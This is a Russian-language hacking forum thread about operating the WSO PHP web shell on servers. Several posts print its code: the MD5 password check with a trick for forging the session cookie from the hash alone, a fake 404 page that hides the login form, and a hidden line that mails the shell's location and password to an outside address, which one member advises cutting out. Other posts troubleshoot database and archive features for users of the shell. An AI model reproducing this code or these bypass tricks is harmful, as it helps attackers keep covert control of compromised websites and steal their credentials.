WSO (веб-шелл)

Discussion in 'Избранное' started by oRb, 26 Jan 2009.

  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Может делать все то, что в нее заложил прогер, покажите код и мы вам объясним, что к чему!
     
    _________________________
  2. artur1111

    artur1111 New Member

    Joined:
    3 Jun 2015
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Уже узнал! она ищет .php файлы которые можно изменить, и выводит список с именами.
     
  3. Dr_Wile

    Dr_Wile Member

    Joined:
    19 Oct 2016
    Messages:
    121
    Likes Received:
    54
    Reputations:
    2
    Пароль root, если он не подходит найди в начале скрипта MD5 хеш и вставь его в гугл строку поиска, тогда найдёшь пароль от шелла
     
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Ну так полагаю, что T.C не знает хэша, а вообще, при наличие хэша не обязательно его брутить!!!

    Давайте посмотрим в сторону кода самого шела как происходит авторизация:

    PHP:
    $auth_pass "63a9f0ea7bb98050796b649e85481845"//пусть условно будет пароль root

    //..........

    if(!empty($auth_pass)) {   //если присутствует пароль
        
    if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) // и пароль равен его хэшь сумме
            
    WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); // отправляем куку с параметром хэшь хоста и значением хэшь пароля

        
    if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
            
    wsoLogin();
    }
    предположим что у нас HOST: localhost

    тогда нам для авторизации, при известном хэше, достаточно будет вставить куку:

    421aa90e079fa326b6494f812ad13e79=63a9f0ea7bb98050796b649e85481845
     
    _________________________
    to.Index, SuNDowN, ACat and 7 others like this.
  5. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
  6. shmell

    shmell New Member

    Joined:
    1 Mar 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
  7. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    __tps://github.com/tennc/webshell/blob/master/php/wso/wso-4.2.5.php

    PHP:
    if(array_key_exists('watching',$_POST)){
        
    $tmp $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('[email protected]''root'$tmp); // Edit or delete!
    }
    Стучалку и вырезать можно!
     
    _________________________
    grimnir likes this.
  8. rdpstore555

    rdpstore555 New Member

    Joined:
    16 Dec 2017
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    thnks for this
     
  9. shmell

    shmell New Member

    Joined:
    1 Mar 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Можно, только остается вопрос каких еще сурпрайзов ждать от этого WSO=((( А так красивый.
     
  10. SuNDowN

    SuNDowN Member

    Joined:
    31 Mar 2008
    Messages:
    25
    Likes Received:
    73
    Reputations:
    -8
    PHP:
    . . .
    @
    session_start();
    @
    ini_set('error_log',NULL);
    @
    ini_set('log_errors',0);
    @
    ini_set('max_execution_time',0);
    @
    set_time_limit(0);
    @
    set_magic_quotes_runtime(0);
    @
    define('WSO_VERSION''2.6');
    if(
    get_magic_quotes_gpc()) {
    function 
    WSOstripslashes($array) {
    return 
    is_array($array) ? array_map('WSOstripslashes'$array) : stripslashes($array);
    }
    $_POST WSOstripslashes($_POST);
    }
    function 
    wsoLogin() {
    die(
    "<h1>Not Found</h1>
    <p>The requested URL was not found on this server.</p>
    <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p>
    <hr>
    <address>Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80</address>
    <style>
    input { margin:0;background-color:#fff;border:1px solid #fff; }
    </style>
    <pre align=center>
    <form method=post>
    <input type=password name=pass>
    </form></pre>"
    );
    }
    if(!isset(
    $_SESSION[md5($_SERVER['HTTP_HOST'])]))
    if( empty(
    $auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
    $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    else
    wsoLogin();
    if(
    strtolower(substr(PHP_OS,0,3)) == "win")
    $os 'win';
    else
    $os 'nix'; . . .
    А возможно ли как то авторизоваться при таком методе авторизации зная лишь md5 исходного пароля $auth_pass ??? Я так понял что нельзя, ну на всякий решил спросить, чем чёрт не шутит.
     
  11. Matrix001

    Matrix001 Active Member

    Joined:
    18 Aug 2016
    Messages:
    262
    Likes Received:
    146
    Reputations:
    3
    Возможно (скорее всего) ...
     
  12. MrSeo

    MrSeo New Member

    Joined:
    21 Apr 2018
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    так наивно впихнули стучалку )
     
    CyberTro1n likes this.
  13. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,174
    Likes Received:
    1,157
    Reputations:
    202
    Классная стучалка, правда $_SERVER['SERVER_NAME'] может содержать не домен а мусор но то все фигня.
     
  14. dragondragon

    dragondragon Member

    Joined:
    8 May 2013
    Messages:
    72
    Likes Received:
    11
    Reputations:
    0
    Народ а почему в zip или tar не упаковываются файлы, ничего не происходит, архив не создаётся?
     
  15. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    PHP скомпайлили/стартовали без поддержки архивов / php-модули для архивов не установлены (php-zip) / или же нет прав на запись.
    Посмотрите phpinfo чего не хватает.
     
    dmax0fw likes this.
  16. Jimio

    Jimio New Member

    Joined:
    20 Dec 2018
    Messages:
    27
    Likes Received:
    0
    Reputations:
    0
    Ребята, такая проблема пытаюсь приконектится к БД, но ничего не получается http://prntscr.com/nr5nyc, такое в 90% случаев, если беру другой шелл, там все ок. Но другой меня не устраивает во всем остальном, нужен именно ВСО. Кто-нибудь знает, в чем может быть проблема и как это пофиксить?
     
  17. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    630
    Likes Received:
    1,050
    Reputations:
    47
    Так в чём ошибка то?
     
  18. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    https://www.php.net/manual/ru/function.mysql-query.php
    Code:
            function query($str) {
                switch($this->type) {
                    case 'mysql':
                        return $this->res = @mysql_query($str);
                        break;
                    case 'pgsql':
                        return $this->res = @pg_query($this->link,$str);
                        break;
                }
                return false;
            }
     
    Jimio likes this.
  19. I_I

    I_I Member

    Joined:
    22 Nov 2013
    Messages:
    67
    Likes Received:
    6
    Reputations:
    1
    oRb ты еще живой?
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Живой!!! но в других темах...

    P.S: Сами патчити!
     
    _________________________